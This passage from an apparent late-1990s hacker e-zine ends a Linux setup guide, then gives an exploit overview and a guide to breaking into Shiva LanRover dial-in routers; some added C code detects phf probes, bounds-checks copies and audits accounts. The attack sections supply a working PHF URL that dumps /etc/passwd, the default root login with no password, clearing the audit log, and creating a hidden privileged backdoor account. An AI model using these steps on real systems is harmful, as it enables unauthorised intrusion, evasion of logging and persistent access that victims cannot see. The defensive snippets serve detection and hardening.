programmers to perform operations on various devices, as they only have to
access a file rather than a device. (if ya don't understand this bit it isn't
important for the moment)

There may be several other directories under the root, but these are the main
ones that you will have to worry about for the moment.

The next thing you will have to do is set up X-Windows, this is a graphical
interface for linux. The thing about X is that there are many different
versions of the desktop environment, unlike windoze where you just have the
standard environment. This is good because you can decide on the style that
suits you best. Personally I prefer KDE at the moment but there are different
ones coming out all the time. To set up X you will need to have the full
specs on your monitor and video card ready. There are 2 ways to set up X,
one is a graphical way, that is quick and easy, but may not work in some
cases (i had hell with this). To run this, at the command line type:

XF86Setup

Or to run a command line setup interface type

xf86config

You will then be presented with the usual menus that ask you about your
hardware. Get that up and running and you SHOULD have a decent working
version of X. A lot of things can go wrong here though; most people have
problems of some sort. The best thing to do, if you do have a problem, is to
go back to the config programs and make sure you had the right specs for your
hardware. Failing that you could try editing the '/etc/XF86Config' file,
although doing this is quite complicated and I would suggest reading up on
how to do it first (or just wing it like most people :) )

Now you should have a fully working Linux system installed, well done. There
is a lot more that I haven't mentioned in this file and the chances are you
will have to read lots of other files to get various things working or learn
about other programs. Linux is an amazing thing if you make the most of it
and ask what it can do rather than what it can't do. Welcome to the new
world.
----------
Greetz

Anyone who can get me a pre-release copy of star wars: I'll pay any money -
pleez

the usual bunch of people who know I appreciate them :)


---(OOooOO)--------Overview of common Exploits--------------------------(OOo-
---(OOooOO)--------by Bodie---------------------------------------------(OOo-
---(OOooOO)--------bodi3@usa.net----------------------------------------(OOo-


This file is a basic explanation of some of the methods of exploiting
systems. It is not a full list; there are many exploits and to list them all
would take up my whole hard disk, but these are the most common.

1) PHF

Laugh if you like but it's surprising to see how often this still works.
Although the number of systems vulnerable is very small now and getting
smaller by the day, it still saves a lot of time over some of the other
exploits. This exploit is even usable by windoze script kiddies.

It works because of a bug in a commonly used CGI script called PHF, which
allows any remote user to see any file on the system and even execute
commands :) To use it open up a web browser (if you wanna be really 31337,
you can telnet to port 80, but why make life hard for yourself) and go to:
http://www.vulnerable.com/cgi-bin/phf?Qalias=x%0a[command]
where [command] is the command you want to execute. A command you can
execute is:
http://www.vulnerable.com/cgi-bin/phf?Qalias=x%0acat%20/etc/passwd
This will execute the command:
cat /etc/passwd
The %20 is used because it is the URL encoding of the space character (ASCII
0x20) and you can't use a literal space in the URL. This command will give you
the password file and then you can start using your favourite cracker to get
the passwords :)

Other CGI Exploits

PHF is just one example of a CGI exploit. The CGI (Common Gateway
Interface) is a system that allows people to interact with web pages. CGI
programs are used in signup processes, games or almost anything on the web.
PHF is an example of a vulnerability in a CGI program but there are many
others. The best known of these is the test-cgi exploit. This allows you to
view the contents of any directory; although this doesn't automatically give
you root access on the system, it will allow you to gather usernames of users
on the system. This will sometimes show up any default accounts on the
system.
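From the web server's side, both of the CGI problems above leave an obvious
trace in the access log: a phf request whose query carries an encoded newline
(%0a), and any request at all for the test-cgi sample script. The following
detector is an added example, not code from the article, run over constructed
log lines in Apache common log format (the addresses and timestamps are made up).

```c
#include <stdio.h>
#include <string.h>

/* Returns 1 if the request targets the phf script and carries an encoded
 * newline (%0a / %0A) inside the URL token, the pattern shown in the text
 * above; a plain phonebook lookup such as "phf?Qalias=jsmith" is not flagged. */
int is_phf_newline_injection(const char *line)
{
    const char *p = strstr(line, "/cgi-bin/phf");
    const char *end;

    if (p == NULL)
        return 0;
    end = p + strcspn(p, " \"");          /* URL token ends at space or quote */
    for (; p + 2 < end; p++)
        if (p[0] == '%' && p[1] == '0' && (p[2] == 'a' || p[2] == 'A'))
            return 1;
    return 0;
}

/* Returns 1 for any request to test-cgi: a sample script that should not be
 * reachable on a production server at all, so every hit counts as a probe. */
int is_test_cgi_probe(const char *line)
{
    return strstr(line, "/cgi-bin/test-cgi") != NULL ? 1 : 0;
}

/* Classifies one access-log line: 2 = phf injection, 1 = test-cgi probe,
 * 0 = nothing of interest. */
int classify_log_line(const char *line)
{
    if (is_phf_newline_injection(line))
        return 2;
    if (is_test_cgi_probe(line))
        return 1;
    return 0;
}

/* Constructed sample log in Apache common log format (not real traffic). */
static const char *sample_log[] = {
    "10.0.0.5 - - [01/Apr/1999:02:14:07 +0000] \"GET /index.html HTTP/1.0\" 200 1043",
    "10.0.0.9 - - [01/Apr/1999:02:15:11 +0000] \"GET /cgi-bin/phf?Qalias=x%0acat%20/etc/passwd HTTP/1.0\" 200 512",
    "10.0.0.9 - - [01/Apr/1999:02:15:30 +0000] \"GET /cgi-bin/test-cgi HTTP/1.0\" 200 300",
    "10.0.0.7 - - [01/Apr/1999:02:16:02 +0000] \"GET /cgi-bin/phf?Qalias=jsmith HTTP/1.0\" 200 220",
};
#define SAMPLE_LOG_LINES (sizeof sample_log / sizeof sample_log[0])

/* Runs the classifier over the sample, printing each finding; stores the
 * per-class counts and returns the total number of suspicious lines. */
int scan_sample_log(int *phf_hits, int *test_cgi_hits)
{
    size_t i;

    *phf_hits = 0;
    *test_cgi_hits = 0;
    for (i = 0; i < SAMPLE_LOG_LINES; i++) {
        int c = classify_log_line(sample_log[i]);
        if (c == 2) {
            (*phf_hits)++;
            printf("ALERT phf newline injection: %s\n", sample_log[i]);
        } else if (c == 1) {
            (*test_cgi_hits)++;
            printf("ALERT test-cgi probe: %s\n", sample_log[i]);
        }
    }
    return *phf_hits + *test_cgi_hits;
}

int main(void)
{
    int phf, tc;
    int total = scan_sample_log(&phf, &tc);

    printf("%d suspicious request(s): %d phf, %d test-cgi\n", total, phf, tc);
    return 0;
}
```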


2)Buffer Overflow Exploits

There are too many of these to name each of them but they all work on the
same principle. Examples of these would include statd, qpop and many more.

Each program can store data in an area of memory called the stack. This
stores data from each routine that a program calls. Take a program like this
(a little programming knowledge is needed):

#include <stdio.h>

/* a routine that just prints a greeting */
void hello() {
    printf("hello");
}

int main() {
    hello();                 /* call the routine, then carry on below */
    printf("now f**k off");
    return 0;
}

This is a very simple program which calls a routine hello() to print "hello"
to the screen (I would've used "hello world" but I couldn't spell world :)).
When the procedure hello is called, any data from the main program is put
onto the stack. In this program there is no data that has to be stored, but
it still has to store the location in the program, so that when it finishes
running the procedure hello() it knows where it got to in the program and
prints "now f**k off" next. To enable the program to do this, the return
address of the next instruction is also stored on the stack.

Helpfully, the buffer is arranged like this:
 _______
|return |
|address|
|_______|
|       |
| Data  |
|_______|

This means that the data is put on the stack in a nice convenient position,
right next to the return address. The data area is allocated as the total
space needed by all the variables that have to be put on the stack. In
our little program earlier there was no need to store any variables as there
were none, but most programs will have variables that they need to store on
the stack. How do ya exploit this? Look here:

#include <string.h>

/* copies its argument into a 10-byte buffer without checking the length */
void ouch(char *ot) {
    char hitme[10];
    strcpy(hitme, ot);          /* no length check: this is the bug */
}

int main() {
    char hehe[100];
    int i;
    for (i = 0; i < 99; i++)    /* fill the 100-byte string with 'A's */
        hehe[i] = 'A';
    hehe[99] = '\0';            /* strcpy needs a terminator to stop at */
    ouch(hehe);
    return 0;
}

Now, here's where it gets a bit more exciting. First the string 'hehe' is
filled with a long list of 'A's; this makes sure that the string is full.
Then the function 'ouch' copies the string 'ot' into the string 'hitme'. In
this function, 'ot' refers to the string 'hehe' in the main body of the
program. 'hitme' is 10 characters long and so is allocated 10 bytes, but if
we copy 'hehe', which is 100 bytes long, into 'hitme' we won't have enough
space. Unfortunately the function we use to copy these 2 strings, strcpy,
doesn't check the length of the strings before it copies them. This means
that the contents of the string 'hitme' are bigger than the space allocated
to it. This causes the string to overrun into other memory areas like this:
                  ______________
                 |              |
                 |              |
Space allocated  |--------------|<------- Actual end of data area, due to
for return ----->|              |         large size of 'hitme'
address          |______________|<------- End of space allocated to data area
                 |              |
Space allocated  |              |
for data area -->|              |
                 |              |
                 |______________|

This means that some of the data area will be taken as the return address.
In our program, the return address will be filled with a line of 'A's; this
won't be a real address in the computer's memory so it will obviously bomb
out with an error.

This type of error can be caused deliberately in some commercial programs
and, more interestingly, unix security programs. This means we can
manipulate the return address of the program to go to anywhere in the
computer's memory. The most common way of exploiting this is to place code
into the data area of the buffer and have the return address point back to
that point in the buffer; this means we can insert our own code into the
program. This opens up the system to all sorts of wonderful effects :)

This was not a total explanation of buffer overflows; for more information
get Phrack issue 49, file 14.

But if ya name's so1o ya don't need to bother with this, just type:
exploit [vulnerable host]
but this is written for any real hacker who wants to know what goes on behind
the code. More to come, but this file just gives ya a general feel for the
exploits.
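The fix for the ouch()/strcpy() problem above is to make the copy refuse
anything that will not fit. This is an added example, not code from the
article: the same 10-byte hitme buffer, but the copy is bounds-checked, so the
100-byte string of 'A's is rejected instead of running over the return address.

```c
#include <stdio.h>
#include <string.h>

/* Bounds-checked replacement for strcpy() into a fixed-size buffer.
 * Returns 0 on success, -1 if src (plus its NUL) would not fit; on
 * failure nothing is copied and dst is left as an empty string. */
int bounded_copy(char *dst, size_t dstsize, const char *src)
{
    size_t len;

    if (dst == NULL || src == NULL || dstsize == 0)
        return -1;
    len = strlen(src);
    if (len >= dstsize) {          /* no room for the data and its NUL */
        dst[0] = '\0';             /* leave dst in a defined state */
        return -1;
    }
    memcpy(dst, src, len + 1);     /* copies the terminating NUL too */
    return 0;
}

/* Same 10-byte local buffer as ouch() in the article, but the copy is
 * refused rather than overrunning the stack. Returns bounded_copy()'s result. */
int safe_ouch(const char *ot)
{
    char hitme[10];

    return bounded_copy(hitme, sizeof hitme, ot);
}

/* Builds the 100-byte string of 'A's from the article (constructed input)
 * and returns 1 if safe_ouch() rejected it, 0 if it accepted it. */
int overflow_attempt_rejected(void)
{
    char hehe[100];

    memset(hehe, 'A', sizeof hehe - 1);
    hehe[sizeof hehe - 1] = '\0';
    return safe_ouch(hehe) == -1 ? 1 : 0;
}

int main(void)
{
    char small[10];

    if (bounded_copy(small, sizeof small, "hello") == 0)
        printf("short copy ok: %s\n", small);
    printf("100-byte input rejected: %s\n",
           overflow_attempt_rejected() ? "yes" : "no");
    return 0;
}
```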

3) Wingates

Wingates have become very popular amongst hackers recently. They allow you to
bounce a connection from any site running one of these; a wingate is basically
a proxy server that allows you to send all your connections through that
host. Unsurprisingly, because of the obvious security holes (and maybe
because of the name :)), a wingate can only be run on a windoze server, or
even just a home box can run a wingate. A wingate was initially built for a
small windoze network to access the net over one line without all the hassle
of setting up all the network software. In other words, it's another
microshaft security hole, something we've seen a lot of in the last few years.

Basically all ya have to do is find a computer with a wingate running and
connect to it, then you can safely hack away :)

4) Exports

Some nice servers actually let you view almost any file on their system by
allowing their whole system to be mounted onto any foreign host. This is
extremely kewl because it means that, if you are logged on as root on your
system, you will have root privileges on the remote system. This
exploit also works in windows, which is why you should never allow any of your
directories to be shared when you are on the net, unless you don't mind losing
the data in the directories and it doesn't contain any confidential stuff or
(as with an unnamed person) your entire dox, that's just stupid.

--------------

More to come; this will give ya a general feel for the exploits but I'll
explain them in more detail in other files - just to keep ya coming back

greetz:
Hybrid: Generally kewl geezer who nicks my modem :)

The old bloke who turns up in Mcdonalds at 2600 meets: One of the weirdest
people in the world (Just beat me to it)

Pro plus: keeping me awake during all those long hacking nights

The US military: Supplying all my shells

9x: supplying t-files so that everyone can copy them


---(OOooOO)--------Hacking the Shiva-LAN-Rover System-------------------(OOo-
---(OOooOO)--------by hybrid--------------------------------------------(OOo-
---(OOooOO)--------th0rn@coldmail.com-----------------------------------(OOo-


**************************************************
* Disclaimer:                                    *
*                                                *
* The information provided in this text file     *
* has been obtained from public domain resources *
* and is intended for educational use only.      *
*                                                *
**************************************************


Contents:

1. Introduction
2. What can Shiva lan rovers do?
3. The command line
4. System security
5. PPP

1. Introduction

Shiva systems are becoming increasingly popular in the LAN networking world.
If like me you have done quite a lot of scanning you will have come across a
login prompt similar to this: [@ Userid:] If you have never seen this before,
take a look at some of the 9x scans at www2.dope.org/9x. In this file I am
going to focus on the security strengths and weaknesses of the ShivaLanRover
networking system, and give a general overview of what can be done with such
systems. The Shiva system is a network security problem in its own right, in
the sense that once you have gained access to one of these platforms, you
have the opportunity to explore the entire network on which the system is
based; in essence, you are on the trusted side of the firewall. If you would
like a copy of the ShivaLanRover software just FTP to ftp.shiva.com or get it
via the WWW.

To find a Shiva, the first thing you should do is dust off that old wardialer
program, and start scanning local or toll-free prefix assignments, if you
can't do this, you suck, go away. You will know when you have found a Shiva
when you are confronted with the following prompt:

@ Userid:

or if Radius authentication is enabled:

Starting Radius Authentification....
@ Userid:

Blah, ignore the radius authentication thing for now, it's just a lame
attempt to make the system look as if it has been secured; in most cases the
sysadmin will have misconfigured the authentication and you will be
surprised as to how easy it is to get in. So you are at the login prompt,
what next? - As in most OS's, Shivas have a nice set of default logins, so the
sysadmin's poor setup is your gain. Try this: login: <root> pass: <NO PASS>.
The root login will work 9 times out of 10. The reason that the root account
works a lot is because in some cases the admin is not even aware the account
exists! Most of the system setup is done via the main terminal, so the
admin doesn't have to login. The root account is not listed in the userfile
database, so most admins overlook it. In some cases the admin will have set
up their own account with something like <admin> <password> but if the admin
has any common sense you will not get in with that. Like most OS's, Shiva
systems have an audit log, so don't sit there trying to brute force anything;
once you are in, you can clear the system log, but more on that later. OK,
you've found a Shiva, you've logged on as <root> <no password>, now what? -
read on.

Once logged in, you will be dropped into the Shiva command line prompt, which
should look something like this:

Shiva LanRover/8E, Patch 4.5.4p6 98/06/09   (version and type of Shiva)
ShivaLanRover/8E#                            (the command prompt; can be
                                              configured to say anything)

To get a list of the available commands type <help> or <?>; this will reveal a
menu similar to this:

ShivaLanRover/8E# ? <enter>

alert                    Send text alert to all dial-in users
busy-out line <number>   Busy-out serial line modem
clear <keyword>          Reset part of the system
comment                  Enter a comment into the log
configure                Enter a configuration session
connect <port pool>      Connect to a shared serial port
crashdump                Write crashblock to log
disable                  Disable privileges
help                     List of available commands
initialize <keyword>     Reinitialize part of the system
lan-to-lan <keyword>     Manage LAN-to-LAN connections
passwd                   Change password
ping <IP host>           Send ICMP echo to IP host
ppp                      Start a PPP session
quit                     Quit from shell
reboot                   Schedule reboot
show <keyword>           Information commands, type "show ?" for list
slip                     Start a SLIP session
telnet <IP host>         Start a Telnet session
testline                 Test a line

The first thing you should do is check to see who is online, at the # prompt
use the show command to reveal the list of current online users:

ShivaLanRover/8E# show users <enter>

Line  User      Activity   Idle/Limit   Up/Limit
   1  jsmith    PPP          0/ 10       0/ None
   2  root      shell        0/ 10       0/ None
Total users: 2

So here we see ourselves logged in on line 2, and a PPP user on line 1. Note
that most of the time users are not configured to be allowed remote dialin
PPP access, so the user jsmith is probably at a terminal on the LAN. Now you
can see who is online, ie- check the admin is not logged in. Next you need to
get a rough idea of the size of the system and its network. At the # prompt
type:

ShivaLanRover/8E# show lines <enter>

Async Lines:
Line State   Rate/P/Stop/ RA|DCD|DSR|DTR|RTS|CTS|Fr errs|Overruns|PErrs
   1 IDLE     57600/N/ 1/   |OFF|ON |on |on |ON |      0|       0|    0
   2 CHAR     57600/N/ 1/   |ON |ON |on |on |ON |      2|       0|    0
   3 IDLE     57600/N/ 1/   |OFF|ON |on |on |ON |      0|       0|    0
   4 IDLE     57600/N/ 1/   |OFF|ON |on |on |ON |      0|       0|    0
   5 IDLE     57600/N/ 1/   |OFF|OFF|on |on |OFF|      0|       0|    0
   6 IDLE    115200/N/ 1/   |OFF|ON |on |on |ON |      0|       0|    0
   7 IDLE     57600/N/ 1/   |OFF|ON |on |on |ON |      0|       0|    0
   8 IDLE    115200/N/ 1/   |OFF|ON |on |on |ON |      0|       0|    0

Here we see a list of the modem ports; as you can see it has 8, which is about
average for most Shiva systems. So now we know how many serial lines there
are, we need to get a rough idea as to how big the network itself is. To do
this type:

ShivaLanRover/8E# show arp <enter>

Protocol  Address         Age  Hardware Addr      Type  Interface
Internet  208.122.87.6    4m   x0-x0-B0-2x-Dx-78  ARPA  Ethernet:IP
Internet  208.122.87.4    4m   AA-0x-x4-00-0C-04  ARPA  Ethernet:IP
Internet  208.122.87.5    4m   Ax-00-04-0x-xD-x4  ARPA  Ethernet:IP
Internet  208.122.86.4    10m  AA-x0-04-00-0C-04  ARPA  Ethernet:IP
Internet  208.122.86.40   0m   AA-00-04-00-x1-04  ARPA  Ethernet:IP
Internet  208.122.86.147  4m   00-80-5x-31-F8-Ax  ARPA  Ethernet:IP
Internet  208.122.86.145  4m   00-80-5x-FE-C9-x8  ARPA  Ethernet:IP
Internet  208.122.86.200  0m   00-x0-A3-xF-21-C8  ARPA  Ethernet:IP
Internet  208.122.86.51   4m   00-x0-B0-01-36-3x  ARPA  Ethernet:IP

Showing the ARP cache reveals some of the boxes connected to the LAN, as well
as their ethernet addresses and protocol type. Now we have established the
kind of system we are on, it's time to do some exploring, which is where I
shall begin this text file.


2. What can Shiva lan rovers do?

Shiva LanRover systems are very big security weaknesses if installed on any
network. The reason for this is that some of the default settings can be
easily overlooked by the admin. A Shiva system can be configured to provide
a wide variety of network services, some of which are listed here:

PPP (point-to-point protocol). This is the key to gaining access to the
network on which the Shiva is based; in most cases the network will have
an internal DNS server, and if you are lucky, the network the system is
on will be connected to the internet. Hint hint, PPP, toll-free. But just
using a Shiva for free net access would be boring, which is why I am going to
discuss the other features of Shivas.

Modem Outdial. In a lot of cases the system will have been configured to
allow modem outdialing, which can be good for calling BBS's, diverting to
other dialups, scanning, but again, this is lame; just using a Shiva for
modem outdialing is boring, use your imagination. If you manage to get a PPP
connection, and the system is net connected, you could get online, and at the
same time call your favourite BBS. I'll explain how to do all of this later.

Telnet, ping, traceroute etc. These are the command line tools which will
enable you to determine whether the system is connected to the internet or
not. More on this later.

It's time to go into detail about all of the Shiva's functions and commands. I
will concentrate on what you can do with root access, because that is the
only account you are likely to gain access to.


3. The command line

When loged into the Shiva shell, you have the following commands at your
disposal:

alert (Send text alert to all dial-in users) - Self explanatory.
busy-out uart <call-interface> (Busy-out UART port)
clear <keyword> (Reset part of the system)

The clear command is a nice feature of the Shiva system. The first thing you
should do when on a Shiva is make sure you erase all logs of your commands
and login times etc.. To do this all you need to do is type <clear log>. This
will erase and reset the audit log, and also any invalid logins to the Shiva.
There are also other clear commands such as <clear arp> etc, but these will
all cause system problems and get you noticed, so best leave them alone for
the time being.

comment (Enter a comment into the log)
configure (Enter a configuration session)

Here's the part where you can get the system to do what you want it to do, ie-
to get a PPP connection you will need to set up another account with shell
and PPP privileges. The root account does not allow PPP connections, so here
is where you will need to do your stuff. To get anywhere with a Shiva you
need to create a new account; using the config command you can create a new
user account with greater privileges than root. Before you make a new account
it is a good idea to see what kind of setup the other accounts have on the
system; you don't want to make an account that will stick out from the other
accounts, so type:

show security <enter> (this gives a list of the security configuration and
the user list.) You should see something like this:

[UserOptions]
PWAttempts=0
ARARoamingDelimiter=@
ExpireDays=30
GraceLogins=6

[Users]
admin=/di/do/rt/pw/sh/pwd=hH8FU4gBxJNMMRQ0yhj5ILUbaS/ml=3/fail=1/time=425
jsmith=/di/pw/pwd=.b9BJFBhuA1vuqFa9s8KBlxmngZ/ml=2/time=897646052
mjones=/di/pw/pwd=kRaOhlyT7CKMBldLVBVbektbCE/ml=2/fail=5/time=897646052
user911=/di/pw/pwd=7Xkq8TOwB4juRI51OHkDVVos8S/ml=2/time=910919159
another=/di/pw/pwd=YhzD6KBUB7Lh2iKKKSWxuR0gx7S/ml=2/fail=7/time=90767094|9
jadmams=/di/pw/pwd=ET0OhPyT7CyMBldLLKVbektbCE/ml=2/time=902262821
msmith=/di/pw/pwd=sDV1Jxo8QJncIRcl9eoVO6SKBE/ml=2/time=897646052
dsmith=/di/pw/pwd=pv8OhPyT45CyMBldLSKVbektbCE/ml=2/time=897646052
padacks=/di/pw/pwd=HoDVw5MqTM*oTL69tBehqt7tiS/ml=2/time=897646052/grace=1
ljohnson=/di/pw/pwd=r.y9NJbrCWKfsSeu9FbfJpAIzZ/ml=2/time=897646052

Here we get a list of the configured users on the system. As you can see the
admin has made him/herself their own account, while other users have accounts
that allow logins via their terminals, but not remotely. In the above example
all the users have been assigned passwords, so it would be a good idea when
you make your own account to have one as well. The idea is to make an account
that will blend in with the others and not look too obvious. The passwords in
the external user list are all 3DES (triple DES) encrypted. The type of user
account set up is determined by the options, such as jsmith=/di/do etc; more
on these functions in a bit. OK, now we need to set up our own account. To do
this we need to enter a configuration session; at the command line prompt
type: ShivaLanRover/8E# config <enter>

You will then drop into the configuration session.

Enter configuration file lines. Edit using:
  ^X, ^U   clear line
  ^H, DEL  delete one character
  ^W       delete one word
  ^R       retype line
Start by entering section header in square brackets []
Finish by entering ^D or ^Z on a new line.

config> (here is where you enter the config commands; to make your own account
do the following)

config> [users]
config> username=/di/do/sh/tp/pw
config> ^D <------ (type control D to finish)


Review configuration changes [y/n]? y
New configuration parameters:
[users]
username=/di/do/sh/tp/pw
Modify the existing configuration [y/n]? y
You may need to reboot for all changed parameters to take effect.

You've just created your own user account which you can use for PPP
connections etc. To begin with your account is un-passworded, so when you log
back in just hit enter for your password; you can change this later. The /sh
part of the user configuration means you can remotely log into the command
shell, /pw means you have the ability to define your own password, and if you
wanted to give yourself another root account, you would use the switch /rt.
In combination with the show config command you can also alter other system
configurations via this method, although it is a very good idea not to
alter anything. Now your account has been set up, all you do is re-connect to
the system and login as your username; more on this later.
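The "show security" user list above is also what an admin should be reading,
because an account created the way just described stands out in it: it has
shell access but no stored pwd= hash. The audit below is an added example, not
code from the article or from Shiva; it takes the flag meanings from the text
(/sh shell login, /rt root privileges, pwd= stored hash), assumes the pwd= value
contains no '/', and uses constructed sample lines with made-up hashes.

```c
#include <stdio.h>
#include <string.h>

#define RISK_ROOT        1   /* /rt: root privileges */
#define RISK_NO_PASSWORD 2   /* no pwd= hash stored for the account */
#define RISK_OPEN_SHELL  4   /* /sh shell login combined with no password */
#define NAME_MAX_LEN     32

/* Parses one "name=/opt/opt/key=value/..." user line. Bare tokens are flags
 * (di, do, rt, pw, sh, tp); tokens containing '=' are settings. Copies the
 * user name into name (at most NAME_MAX_LEN-1 chars) and returns the RISK_*
 * bits, or -1 if the line is not a user entry (section header, a
 * [UserOptions] setting, or a blank line). */
int audit_user_line(const char *line, char *name)
{
    const char *eq = strchr(line, '=');
    const char *p;
    size_t namelen;
    int has_rt = 0, has_sh = 0, has_pwd = 0, risk = 0;

    if (eq == NULL || eq == line || eq[1] != '/')
        return -1;
    namelen = (size_t)(eq - line);
    if (namelen >= NAME_MAX_LEN)
        namelen = NAME_MAX_LEN - 1;
    memcpy(name, line, namelen);
    name[namelen] = '\0';

    /* walk the '/'-separated option tokens after the '=' */
    p = eq + 1;
    while (*p == '/') {
        const char *tok = p + 1;
        size_t len = strcspn(tok, "/\r\n");   /* token ends at '/' or end of line */

        if (len == 2 && strncmp(tok, "rt", 2) == 0)
            has_rt = 1;
        else if (len == 2 && strncmp(tok, "sh", 2) == 0)
            has_sh = 1;
        else if (len > 4 && strncmp(tok, "pwd=", 4) == 0)
            has_pwd = 1;                       /* non-empty stored hash */
        p = tok + len;
    }

    if (has_rt)
        risk |= RISK_ROOT;
    if (!has_pwd)
        risk |= RISK_NO_PASSWORD;
    if (has_sh && !has_pwd)
        risk |= RISK_OPEN_SHELL;
    return risk;
}

/* Constructed sample modelled on the [Users] output above; the hashes are
 * placeholders, and the last line is the kind of account the text creates. */
static const char *sample_users[] = {
    "admin=/di/do/rt/pw/sh/pwd=EXAMPLEHASH1/ml=3/fail=1/time=425",
    "jsmith=/di/pw/pwd=EXAMPLEHASH2/ml=2/time=897646052",
    "username=/di/do/sh/tp/pw",
};
#define SAMPLE_USERS (sizeof sample_users / sizeof sample_users[0])

/* Returns how many sample accounts carry the RISK_OPEN_SHELL finding. */
int count_open_shell_accounts(void)
{
    char name[NAME_MAX_LEN];
    size_t i;
    int n = 0;

    for (i = 0; i < SAMPLE_USERS; i++) {
        int r = audit_user_line(sample_users[i], name);
        if (r > 0 && (r & RISK_OPEN_SHELL))
            n++;
    }
    return n;
}

int main(void)
{
    char name[NAME_MAX_LEN];
    size_t i;

    for (i = 0; i < SAMPLE_USERS; i++) {
        int r = audit_user_line(sample_users[i], name);
        if (r < 0)
            continue;
        printf("%-10s root=%d no_password=%d open_shell=%d\n", name,
               !!(r & RISK_ROOT), !!(r & RISK_NO_PASSWORD),
               !!(r & RISK_OPEN_SHELL));
    }
    printf("%d account(s) with shell access and no password\n",
           count_open_shell_accounts());
    return 0;
}
```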

connect <PhoneGroup pool> (Connect to a serial port or modem)

This is another one of the good features of Shivas: you can remotely control
a series of modems on the system, and in a lot of cases dialout. If you want
to call a BBS, note you cannot upload using Zmodem or similar protocols,
although you would be able to download, but expect a few CRC checksum errors.
To connect to a modem type: connect all_ports <enter>. You will then drop into
one of the modem pools, as follows:

Connecting to Serial2 at 115200 BPS.
Escape character is CTRL-^ (30).
Type the escape character followed by C to get back,
or followed by ? to see other options.

(here basic modem commands are necessary; use the following to dialout)

ATZ (initialise modem)
ATDTxxxxxxxxx (atdt then phone number) Note in some cases the modem outdial
will be based upon the system PBX, so sometimes you will have to figure out
the outdialing code, which should be something simple like dialing a 9 before
the number you want to connect to. To disconnect from the outdialing session
type control C, or ^C. This will take you back to the command line. As with
the other system events, outdialing is logged into the audit file, along with
the number you called. It is generally a good idea to clear the audit log
after things like PPP or dialout; again just type clear log <enter>.

cping <IP host> (Send continuous ICMP echoes to IP host)
crashdump (Write crashblock to log)
detect (Detect the configuration of an interface)
disable (Disable your root privileges)
dmc <keyword> (Information commands, type "dmc ?" for list)

down <slot> <firstmodem> (last Remove modems from CCB pool)
info <slot> <modem> (Print info for specified modem)
mupdate <slot> <firstmodem> (l Update Rockwell modem FW)
state (Print state of a modem)
status (Print status of all modems)
trace (Trace message passing)
up <slot> <firstmodem> (lastmo Add modems to CCB pool)
test_1slot <slot> (Tests DMC card in slot specified)
test_allcards (Tests all DMC cards found in system)
test_golden <golden slot> (Tests all DMC cards against a Golden DMC)
test_loopall <count 0-99> (Tests All DMC's for count)
test_modempair <slot1> (modem1 Tests modems against each other)
test_slotpair <slot1> <slot2> (Tests a DMC card against another)
test_xmitloop <s> <m> <s> <m> (Tests modem pair for count)

help (List of available commands)
history (List of previous commands)
initialize <keyword> (Reinitialize part of the system)
l2f <keyword> (L2F commands)

close <nickname> (Close tunnel to L2F HG)
login (Start L2F session)
tunnels (Show open tunnels)

lan-to-lan <keyword> (Manage LAN-to-LAN connections)
passwd (Change password)
ping <IP host> (Send ICMP echo to IP host)
ppp (Start a PPP session)
quit (Quit from shell)
reboot (Schedule reboot)
route <protocol> (Modify a protocol routing table)
rlogin <IP host> (Start an rlogin session)
show <keyword> (Information commands, type "show ?" for list)

show+
account <keyword> (Accounting information)
arp (ARP cache)
bridge <keyword> (Bridging information)
buffers (Buffer usage)
configuration (Stored configuration, may specify sections)

The show config command will reveal all the system configuration setups,
including DNS server information, security configuration, IP routing etc.
It will also show the internal IPs of RADIUS authentication and TACACS
servers.

show+
finger (Current user status)
interfaces [name1 [name2 ... ] (Interface information)
ip <keyword> (Internet Protocol information, type "show ip ?" for list)

To get an idea of the routing information, and again how big the network is,
type show ip route. This will bring up a routing table, and again give you
an idea as to where the connected boxes are; it is a good idea to note the IP
prefixes.

show+
lan-to-lan (LAN-to-LAN connections)
license (Licensing information)
lines (Serial line information)
log (Log buffer)

The show log command will display the system audit log in full. Here
you will be able to see what is going on on the system, ie- is it primarily
used for PPP, dialout etc. If users use the system for outdialing, you can
even see the numbers that they dial. Here is a cut down example of what
you would see in a system log file:

Mon 15 16:24:29 GMT 1998 4530 Serial4: "krad" logged in
00:01 4531 Serial4:PPP: Received LCP Code Reject for code 0D
00:01 4532 Serial4:PPP: Received PPP Protocol Reject for IPXCP (802B)
00:00 4533 Serial4:PPP:IP address xx.xx.xx.xx dest xx.xx.xx.xx bcast
00:00 4534 Serial4:PPP: IPCP layer up
00:04 4535 Serial4:PPP: CCP layer up
14:09 4536 Serial4:PPP: IPCP layer down
00:00 4537 Serial4:PPP: CCP layer down
00:00 4538 Serial4:PPP: LCP layer down
00:01 4539 Serial4:PPP: CD dropped on connection
00:00 4540 Serial4: "krad" logged out: user exit after 14:17 (Dial-In PPP,)
00:06 4541 Serial4: Rate 115200bps
00:00 4542 Serial4: Modem string 'AT&FW1&C1&D3&K3&Q5&S1%C3\N3S95=47S0=1&W'
00:01 4543 Serial4: Initialized modem
04:56 4544 setting time of day from real-time clock to Wed Nov 25 16:43:44
18:27 4545 Serial4: New Dial-In session
00:00 4546 Serial4:PPP: LCP layer up
00:00 4547 Serial4: "krad" logged in
00:01 4548 Serial4:PPP: Received LCP Code Reject for code 0C
00:00 4549 Dialin:IPX configured net 9823O049
00:00 4550 Serial4:PPP: IPXCP layer up
00:00 4670 Serial4: New Command Shell session
00:03 4671 Serial4: "root" logged in
01:38 4672 Serial4: "root" logged out: user exit after 01:42 (Command Shell)
00:06 4673 Serial4: Rate 115200bps
00:01 4674 Serial4: Modem string 'AT&FW1&C1&D3&K3&Q5&S1%C3\N3S95=47S0=1&W'
00:00 4675 Serial4: Initialized modem
55:11 4676 Could not parse IP SNMP request.

In the system log, you will also see invalid login attempts, error messages,
and general system events. Because the log file logs everything, it is a good
idea to erase your own presence in it.

show+
modem <keyword> (Internal modem information, type "show modem ?" for list)
netbeui <keyword> (NetBeui information, type "show netbeui ?" for list)
novell <keyword> (NetWare information, type "show novell ?" for list)
ppp (PPP multilink bundles and links)
processes (Active system processes)
security (Internal userlist)
semaphores (Active system semaphores)
slot <keyword> (Internal serial slot information, type "show slot ?" for list)
upload (Upload information)
users (Current users of system)
version (General system information, also shows DNS info)
virtual-connections (Virtual Connection information)

slip (Start a SLIP session)
telnet <IP host> (Start a Telnet session)
tftp (Download new image, ie- system config files)
tunnel <IP host> (Start a Tunnel session)
wan [action] <wan interface> (Perform actions on WAN Interface)

4. System security

Shivas can be very weak on security, due to the exposed root account. If the
system is configured properly they can be very secure systems, although this
is usually not the case. There are many security options for the Shiva system
